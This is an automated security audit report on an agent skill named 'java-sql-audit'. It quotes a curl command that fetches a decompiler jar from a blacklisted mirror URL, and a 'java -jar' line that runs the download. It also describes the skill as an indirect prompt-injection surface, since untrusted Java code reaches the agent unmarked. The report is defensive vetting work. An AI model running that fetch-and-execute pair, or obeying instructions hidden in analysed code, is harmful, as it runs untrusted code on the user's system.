java-sql-audit
Fail
Audited by Gen Agent Trust Hub on May 1, 2026
Risk Level: CRITICAL
EXTERNAL_DOWNLOADS, REMOTE_CODE_EXECUTION, COMMAND_EXECUTION
Full Analysis
- [EXTERNAL_DOWNLOADS]: The skill provides instructions to download an external tool from an untrusted and blacklisted source.
  - Evidence: The file `references/DECOMPILE_STRATEGY.md` contains the command `curl -L -o {output_path}/cfr-0.152.jar "https://xget.xi-xu.me/gh/leibnitz27/cfr/releases/download/0.152/cfr-0.152.jar"`.
  - Scanner Result: Automated security scanners flagged this URL as malicious (URL:Blacklist).
- [REMOTE_CODE_EXECUTION]: The skill facilitates remote code execution by instructing the agent to run a downloaded binary from an untrusted source.
  - Evidence: In `references/DECOMPILE_STRATEGY.md`, the command `java -jar {CFR_JAR} ...` is used to execute the downloaded file.
- [COMMAND_EXECUTION]: The skill uses various shell commands to perform file system operations and execute programs, including the downloaded malicious binary.
  - Evidence: Extensive use of `find`, `grep`, `xargs`, and `java` commands throughout the skill files.
- [INDIRECT_PROMPT_INJECTION]: The skill audits untrusted Java code, creating an attack surface for indirect prompt injection where malicious comments or code could influence agent behavior.
  - Ingestion points: `SKILL.md` and `references/DECOMPILE_STRATEGY.md` describe auditing user-provided Java source files (.java), class files (.class), and XML configurations.
  - Boundary markers: Absent; there are no instructions to distinguish between the agent's instructions and the data being analyzed.
  - Capability inventory: File system access, shell command execution, and invocation of other analysis tools.
  - Sanitization: Absent; the skill does not validate or sanitize the analyzed content before processing it.
Recommendations
- CRITICAL: 1 infected file(s) detected - DO NOT USE
- AI detected serious security threats
- Contains 1 malicious URL(s) - DO NOT USE
Audit Metadata